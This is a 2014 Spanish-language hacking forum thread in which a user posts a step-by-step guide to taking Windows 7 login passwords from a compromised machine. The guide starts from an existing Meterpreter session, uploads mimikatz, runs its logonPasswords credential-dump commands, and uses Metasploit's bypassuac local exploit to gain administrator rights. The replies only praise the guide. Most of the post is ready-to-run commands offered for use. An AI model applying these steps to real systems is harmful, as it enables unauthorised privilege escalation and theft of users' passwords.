comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Meterpreter + mimikatz

  • 5 Respuestas
  • 4109 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Typh0n

  • *
  • Underc0der
  • Mensajes: 22
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
  • Skype: xtyphonx
« en: Marzo 05, 2014, 05:52:00 am »

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

Código: Bash
  1. getsystem
o también

Código: Bash
  1. hashdump
pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:



Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos No tienes permisos para ver links. Registrate o Entra con tu cuenta, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32



ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload



lo siguiente es lanzar una shell

Código: Bash
  1. shell

y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

Código: Bash
  1. privilege::debug
  2. sekurlsa::logonPasswords full

Nos saldrá este error esto por el tema de privilegios



Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

Código: Bash
  1. background



Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

Código: Bash
  1. use exploit/windows/local/bypassuac
  2. set SESSION 1
  3. exploit



Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

Código: Bash
  1. sessions -i 2

nos damos cuenta que tenemos maximos privilegios con el comando

Código: Bash
  1. getuid



Finalmente lanzamos la shell y ejecutamos mimikatz.exe



Eso es todo Saludos  :)

« Última modificación: Marzo 05, 2014, 05:55:34 am por Typh0n »

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5400
  • Actividad:
    40%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Marzo 05, 2014, 07:57:57 am »
Que buen post bro!!!
Excelente!


Desconectado Nuvo

  • *
  • Underc0der
  • Mensajes: 67
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Marzo 06, 2014, 12:07:32 am »
Buenaaas

Muy bien explicado, solo hay que ponerlo a prueba.

Un saludo
Ralph wiggum

Desconectado moonshadow

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
  • La practica hace al maestro
    • Ver Perfil
« Respuesta #3 en: Marzo 06, 2014, 02:30:58 am »
que buen post, me funciono bien

Desconectado lejiro

  • *
  • Underc0der
  • Mensajes: 10
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #4 en: Marzo 06, 2014, 05:31:41 am »
Muy buen aporte, gracias por esta comunidad con material de calidad, lo pruebo y les comento

Desconectado CrazyKade

  • *
  • Underc0der
  • Mensajes: 182
  • Actividad:
    0%
  • Reputación 0
  • Я только знаю что ничего не знаю!
    • Ver Perfil
« Respuesta #5 en: Marzo 06, 2014, 08:53:19 am »
Muy bueno Typh0n!!!!
Felicidades!

CrazyKade

 

¿Te gustó el post? COMPARTILO!



Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

Iniciado por puntoCL

Respuestas: 3
Vistas: 2165
Último mensaje Octubre 01, 2018, 03:05:53 pm
por Kyxda
Curso Metasploit - Part. 4.1 - Demostracion de comandos de meterpreter

Iniciado por puntoCL

Respuestas: 0
Vistas: 1082
Último mensaje Marzo 05, 2018, 07:22:09 pm
por puntoCL
XLSInjector – Inyectar Shell Meterpreter en Archivos Excel

Iniciado por Stuxnet

Respuestas: 4
Vistas: 3067
Último mensaje Noviembre 19, 2014, 07:13:03 pm
por baron.power
Curso Metasploit - Part. 4.2 - Demostracion de comandos de meterpreter

Iniciado por puntoCL

Respuestas: 0
Vistas: 1222
Último mensaje Abril 01, 2018, 07:02:51 am
por puntoCL
Sesión de meterpreter con BeEF y metasploit (exploit java)

Iniciado por Lonewolf

Respuestas: 4
Vistas: 3203
Último mensaje Octubre 13, 2016, 03:31:00 pm
por PikachuDorado